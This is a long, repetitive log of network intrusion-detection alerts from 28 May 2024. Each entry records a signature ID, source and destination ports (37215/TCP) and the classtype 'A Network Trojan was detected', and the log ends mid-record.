          Timestamp:05/28/24-14:47:46.961627
          SID:2835222
          Source Port:45448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794098
          SID:2829579
          Source Port:33618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114325
          SID:2835222
          Source Port:36752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332036
          SID:2829579
          Source Port:33608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764092
          SID:2829579
          Source Port:35008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892929
          SID:2829579
          Source Port:45458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164834
          SID:2835222
          Source Port:51474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963976
          SID:2835222
          Source Port:34002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.332919
          SID:2835222
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093776
          SID:2835222
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080676
          SID:2829579
          Source Port:44038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.218203
          SID:2829579
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268559
          SID:2835222
          Source Port:34318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594873
          SID:2835222
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923565
          SID:2835222
          Source Port:41506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093211
          SID:2835222
          Source Port:48206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228799
          SID:2835222
          Source Port:56696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876971
          SID:2835222
          Source Port:38222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525512
          SID:2835222
          Source Port:37740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803154
          SID:2835222
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112215
          SID:2835222
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.489610
          SID:2829579
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424494
          SID:2835222
          Source Port:44132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196792
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234066
          SID:2829579
          Source Port:41890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635628
          SID:2835222
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530096
          SID:2835222
          Source Port:42758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323569
          SID:2835222
          Source Port:42168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659802
          SID:2829579
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931895
          SID:2829579
          Source Port:42224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597142
          SID:2829579
          Source Port:56452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744706
          SID:2835222
          Source Port:58086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965014
          SID:2835222
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680616
          SID:2829579
          Source Port:35810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.823247
          SID:2835222
          Source Port:35406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555132
          SID:2829579
          Source Port:43232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961608
          SID:2829579
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793609
          SID:2835222
          Source Port:52462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341991
          SID:2835222
          Source Port:58854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914243
          SID:2829579
          Source Port:57416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267404
          SID:2829579
          Source Port:51062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709012
          SID:2835222
          Source Port:60612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868566
          SID:2829579
          Source Port:60004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117019
          SID:2835222
          Source Port:38602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914688
          SID:2829579
          Source Port:45078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414252
          SID:2835222
          Source Port:46276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733176
          SID:2829579
          Source Port:54766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.295039
          SID:2829579
          Source Port:54346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819074
          SID:2835222
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336965
          SID:2835222
          Source Port:42314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.132910
          SID:2829579
          Source Port:34646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949815
          SID:2835222
          Source Port:56194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722380
          SID:2829579
          Source Port:51738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.234695
          SID:2829579
          Source Port:38948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399195
          SID:2835222
          Source Port:55706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857756
          SID:2829579
          Source Port:39696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401260
          SID:2829579
          Source Port:58530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501251
          SID:2829579
          Source Port:58700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226488
          SID:2829579
          Source Port:44854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239378
          SID:2829579
          Source Port:36368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734401
          SID:2835222
          Source Port:33738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870926
          SID:2829579
          Source Port:57590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062832
          SID:2829579
          Source Port:56810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554137
          SID:2829579
          Source Port:50944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760245
          SID:2829579
          Source Port:43714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859749
          SID:2835222
          Source Port:48420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298252
          SID:2835222
          Source Port:48362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610966
          SID:2835222
          Source Port:50944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781357
          SID:2835222
          Source Port:38884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042423
          SID:2835222
          Source Port:43510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482569
          SID:2835222
          Source Port:42356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278106
          SID:2835222
          Source Port:58476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222861
          SID:2829579
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269878
          SID:2835222
          Source Port:58276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846341
          SID:2835222
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287571
          SID:2829579
          Source Port:45476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665449
          SID:2835222
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115395
          SID:2829579
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084812
          SID:2835222
          Source Port:48534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221273
          SID:2835222
          Source Port:35900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778164
          SID:2835222
          Source Port:39728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597642
          SID:2835222
          Source Port:48882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711034
          SID:2835222
          Source Port:46066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338707
          SID:2829579
          Source Port:46858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597748
          SID:2835222
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770742
          SID:2835222
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272715
          SID:2829579
          Source Port:51120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551982
          SID:2829579
          Source Port:35100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796458
          SID:2835222
          Source Port:55324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213295
          SID:2835222
          Source Port:40790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371494
          SID:2829579
          Source Port:59654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170418
          SID:2829579
          Source Port:37120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229774
          SID:2835222
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328033
          SID:2835222
          Source Port:37552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666611
          SID:2829579
          Source Port:51872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272669
          SID:2829579
          Source Port:60034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272690
          SID:2835222
          Source Port:34274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273320
          SID:2835222
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216259
          SID:2829579
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269191
          SID:2835222
          Source Port:38802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323960
          SID:2835222
          Source Port:58838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322097
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328614
          SID:2835222
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804860
          SID:2835222
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145297
          SID:2829579
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815865
          SID:2835222
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607575
          SID:2829579
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195919
          SID:2829579
          Source Port:60756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399823
          SID:2829579
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927690
          SID:2829579
          Source Port:44480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268590
          SID:2835222
          Source Port:50154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977944
          SID:2829579
          Source Port:56714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155067
          SID:2835222
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594718
          SID:2835222
          Source Port:43286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048797
          SID:2829579
          Source Port:36232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330203
          SID:2829579
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760264
          SID:2829579
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594281
          SID:2835222
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599067
          SID:2835222
          Source Port:37022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201387
          SID:2835222
          Source Port:35304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102281
          SID:2829579
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167622
          SID:2835222
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464077
          SID:2829579
          Source Port:54444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561083
          SID:2829579
          Source Port:52180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160396
          SID:2835222
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652915
          SID:2835222
          Source Port:39572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985058
          SID:2829579
          Source Port:56924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112880
          SID:2835222
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430359
          SID:2829579
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471184
          SID:2835222
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325292
          SID:2829579
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188198
          SID:2829579
          Source Port:47182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978664
          SID:2835222
          Source Port:48770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941627
          SID:2829579
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710264
          SID:2835222
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475709
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102773
          SID:2835222
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.738507
          SID:2829579
          Source Port:54026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739684
          SID:2835222
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665350
          SID:2835222
          Source Port:51674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548475
          SID:2829579
          Source Port:34354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.617177
          SID:2829579
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849113
          SID:2829579
          Source Port:40182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326848
          SID:2835222
          Source Port:36036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191797
          SID:2835222
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.333329
          SID:2835222
          Source Port:53918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463538
          SID:2829579
          Source Port:45384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629732
          SID:2835222
          Source Port:60342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678642
          SID:2829579
          Source Port:36468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175766
          SID:2829579
          Source Port:50650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979175
          SID:2835222
          Source Port:44476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156954
          SID:2835222
          Source Port:43714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841235
          SID:2829579
          Source Port:50358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710997
          SID:2829579
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243214
          SID:2829579
          Source Port:55072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877881
          SID:2829579
          Source Port:46818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215965
          SID:2829579
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159641
          SID:2835222
          Source Port:41512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147447
          SID:2835222
          Source Port:47470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044238
          SID:2829579
          Source Port:39666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267583
          SID:2835222
          Source Port:60306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204823
          SID:2835222
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.161594
          SID:2829579
          Source Port:40544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806272
          SID:2835222
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946828
          SID:2835222
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116738
          SID:2829579
          Source Port:46780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.663382
          SID:2829579
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.802757
          SID:2829579
          Source Port:34122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941648
          SID:2829579
          Source Port:42654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689065
          SID:2835222
          Source Port:60090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923792
          SID:2829579
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.619377
          SID:2829579
          Source Port:49426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864251
          SID:2829579
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267249
          SID:2835222
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501136
          SID:2835222
          Source Port:38760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213353
          SID:2829579
          Source Port:38068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613920
          SID:2829579
          Source Port:36014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724618
          SID:2829579
          Source Port:39066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978241
          SID:2829579
          Source Port:51606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756762
          SID:2829579
          Source Port:43148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323563
          SID:2829579
          Source Port:59462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594289
          SID:2835222
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804541
          SID:2835222
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887030
          SID:2829579
          Source Port:45872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652332
          SID:2835222
          Source Port:41158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151965
          SID:2829579
          Source Port:60786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983442
          SID:2835222
          Source Port:52520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617118
          SID:2829579
          Source Port:57450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.220692
          SID:2835222
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689498
          SID:2829579
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.985481
          SID:2829579
          Source Port:57672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213714
          SID:2829579
          Source Port:41956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808549
          SID:2829579
          Source Port:37614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224888
          SID:2835222
          Source Port:59196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215897
          SID:2829579
          Source Port:49992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064236
          SID:2829579
          Source Port:51034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280955
          SID:2829579
          Source Port:56990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736689
